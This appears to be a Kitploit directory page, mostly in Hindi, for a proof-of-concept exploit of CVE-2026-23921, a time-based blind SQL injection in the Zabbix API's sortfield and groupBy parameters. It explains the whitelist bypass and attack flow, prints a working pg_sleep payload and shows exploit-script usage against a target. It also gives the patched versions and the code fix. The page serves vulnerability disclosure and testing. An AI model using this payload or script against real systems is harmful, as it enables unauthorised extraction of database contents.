Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23921 — CVE-2026-23921 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zabbix API में sortfield पैरामीटर के माध्यम से टाइम-बेस्ड ब्लाइंड SQL इंजेक्शन है, जो PostgreSQL और MySQL बैकएंड से डेटा निकालने में सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/qucklecrabik/cve-2026-23921
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubqucklecrabik/cve-2026-23921

CVE-2026-23921

CVE-2026-23921 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zabbix API में sortfield पैरामीटर के माध्यम से टाइम-बेस्ड ब्लाइंड SQL इंजेक्शन है, जो PostgreSQL और MySQL बैकएंड से डेटा निकालने में सक्षम बनाता है।

रिपॉजिटरी देखें
131 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23921 — Zabbix समय-आधारित ब्लाइंड SQL इंजेक्शन

प्रभावित संस्करण: Zabbix < 7.0.22 / < 7.2.15 / < 7.4.6
CVSS: उच्च
प्रकार: sortfield पैरामीटर के माध्यम से समय-आधारित ब्लाइंड SQL इंजेक्शन
प्रमाणीकरण आवश्यक: हाँ (कोई भी API उपयोगकर्ता; Super Admin अनुमति जॉइन से बचता है)

भेद्यता

विरासत Zabbix API सेवाएँ (host.get, trigger.get, item.get, आदि) zbx_array_merge() के माध्यम से एक अघोषित groupBy पैरामीटर स्वीकार करती हैं। CApiService::applyQuerySortOptions() में, groupBy सरणी को मान्य करने के लिए उपयोग की जाने वाली हार्डकोडेड व्हाइटलिस्ट को प्रतिस्थापित कर देती है। एक हमलावर और दोनों में समान SQL पेलोड पास करता है — मान्यता हमलावर-नियंत्रित सूची के विरुद्ध पास हो जाती है, और पेलोड बिना एस्केपिंग के में पहुँच जाता है।

sortfield
groupBy
sortfield
ORDER BY

हमला प्रवाह

  1. हमलावर groupBy: ["hostid,(SELECT IF(...))--"] और sortfield: "hostid,(SELECT IF(...))--" को countOutput: true के साथ भेजता है
  2. zbx_array_merge अघोषित groupBy कुंजी को संरक्षित करता है
  3. applyQuerySortOptions groupBy से व्हाइटलिस्ट बनाता है → मान्यता पास हो जाती है
  4. applyQuerySortField पेलोड को ORDER BY में जोड़ता है
  5. createSelectQueryFromParts बिना एस्केपिंग के अंतिम SQL बनाता है

परिणामी SQL (PostgreSQL)

root@kitploit:~
SELECT COUNT(*) AS rowscount
FROM hosts h
WHERE h.flags IN (0,4)
ORDER BY h.hostid,(SELECT CASE WHEN ascii(substring(version() FROM 1 FOR 1))>50
                   THEN pg_sleep(3) ELSE pg_sleep(0) END)--

उपयोग

root@kitploit:~
# PostgreSQL backend (default)
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --user Admin --password zabbix --db pgsql

# MySQL backend
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --user Admin --password zabbix --db mysql

# Existing auth token
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --auth <token> --db pgsql

# Extract arbitrary expression
python exploit_CVE-2026-23921.py \
    --url ... --auth ... --db pgsql \
    --expr "current_user"

# Use a different API method
python exploit_CVE-2026-23921.py \
    --url ... --auth ... --db mysql \
    --method trigger.get --sort-col triggerid

समाधान

Zabbix 7.0.22 / 7.2.15 / 7.4.6 या बाद के संस्करण में अपग्रेड करें।

पैच array_merge($options['groupBy'], ...) को array_intersect($this->sortColumns, $options['groupBy']) से प्रतिस्थापित करता है ताकि हमलावर-आपूर्ति किए गए मान कभी व्हाइटलिस्ट में प्रवेश न करें। रक्षा-गहराई के रूप में अतिरिक्त is_string() और is_array() प्रकार जाँच जोड़ी गई हैं।

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके आप स्वामी हैं या जिनका परीक्षण करने के लिए आपके पास स्पष्ट लिखित अनुमति है।

टूल डाउनलोड करें